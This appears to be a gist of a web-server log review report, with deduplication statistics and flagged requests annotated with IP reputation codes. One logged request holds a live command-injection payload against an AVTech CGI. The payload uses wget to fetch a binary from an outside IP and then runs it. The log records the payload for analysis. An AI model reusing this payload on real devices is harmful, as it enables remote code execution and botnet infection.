
@9b 9b/log-review.txt
Last active Nov 8, 2018

{
'statistics': {
'noise': 264,
'ips_processed': 283,
'duplicate_entries': 4609,
'money_saved': '$179.17',
'duplicate_ratio': 94.0,
'noise_ratio': 93.0,
'time_saved': '8:48:00',
'interest': 19,
'lines_processed': 4892
},
'flagged': [{
'code': '0x08',
'ip': '43.251.16.253',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '43.251.16.253 - - [28/Oct/2018:21:41:09 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}, {
'code': '0x00',
'ip': '151.52.18.121',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.18.121 - - [29/Oct/2018:16:52:04 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '93.229.192.199',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '93.229.192.199 - - [30/Oct/2018:06:48:35 +0000] "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://104.244.76.210/avtech%20-O%20darkxo;%20chmod%20777%20darkxo;%20sh%20darkxo)&password=admin HTTP/1.1" 400 0 "-" "Sefa"\n'
}, {
'code': '0x08',
'ip': '41.73.228.160',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '41.73.228.160 - - [30/Oct/2018:11:46:38 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
}, {
'code': '0x00',
'ip': '201.253.109.30',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '201.253.109.30 - - [31/Oct/2018:07:28:22 +0000] "GET /wp-login.php HTTP/1.1" 302 580 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1"\n'
}, {
'code': '0x00',
'ip': '138.197.15.168',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '138.197.15.168 - - [31/Oct/2018:15:16:53 +0000] "HEAD / HTTP/1.1" 302 197 "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"\n'
}, {
'code': '0x00',
'ip': '188.158.110.52',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '188.158.110.52 - - [31/Oct/2018:20:02:05 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"\n'
}, {
'code': '0x00',
'ip': '84.188.73.252',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '84.188.73.252 - - [31/Oct/2018:21:28:02 +0000] "HEAD http://54.70.60.202:80/phpmyadmin/ HTTP/1.1" 302 245 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '125.160.45.188',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '125.160.45.188 - - [31/Oct/2018:23:06:52 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '151.52.19.187',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.19.187 - - [31/Oct/2018:23:32:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '54.36.150.76',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '54.36.150.76 - - [01/Nov/2018:05:53:16 +0000] "GET /robots.txt HTTP/1.1" 404 2596 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
}, {
'code': '0x00',
'ip': '54.36.150.167',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '54.36.150.167 - - [01/Nov/2018:05:53:16 +0000] "GET / HTTP/1.1" 200 7775 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"\n'
}, {
'code': '0x00',
'ip': '82.58.159.157',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '82.58.159.157 - - [02/Nov/2018:03:40:07 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '151.52.31.246',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '151.52.31.246 - - [02/Nov/2018:11:43:28 +0000] "GET / HTTP/1.1" 302 491 "-" "-"\n'
}, {
'code': '0x00',
'ip': '73.27.15.168',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '73.27.15.168 - - [03/Nov/2018:19:00:23 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"\n'
}, {
'code': '0x08',
'ip': '202.182.133.2',
'noise': False,
'code_message': 'Code message unknown: 0x08',
'log_line': '202.182.133.2 - - [03/Nov/2018:23:25:08 +0000] "GET / HTTP/1.1" 302 491 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"\n'
}, {
'code': '0x00',
'ip': '123.207.171.250',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '123.207.171.250 - - [04/Nov/2018:02:48:42 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}, {
'code': '0x00',
'ip': '77.234.68.136',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '77.234.68.136 - - [04/Nov/2018:21:56:50 +0000] "GET / HTTP/1.1" 302 556 "https://brandnewblogs.com/blogs-july-2018/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"\n'
}, {
'code': '0x00',
'ip': '117.50.73.19',
'noise': False,
'code_message': 'IP has never been observed scanning the Internet',
'log_line': '117.50.73.19 - - [04/Nov/2018:22:01:51 +0000] "PROPFIND / HTTP/1.1" 302 507 "-" "-"\n'
}]
}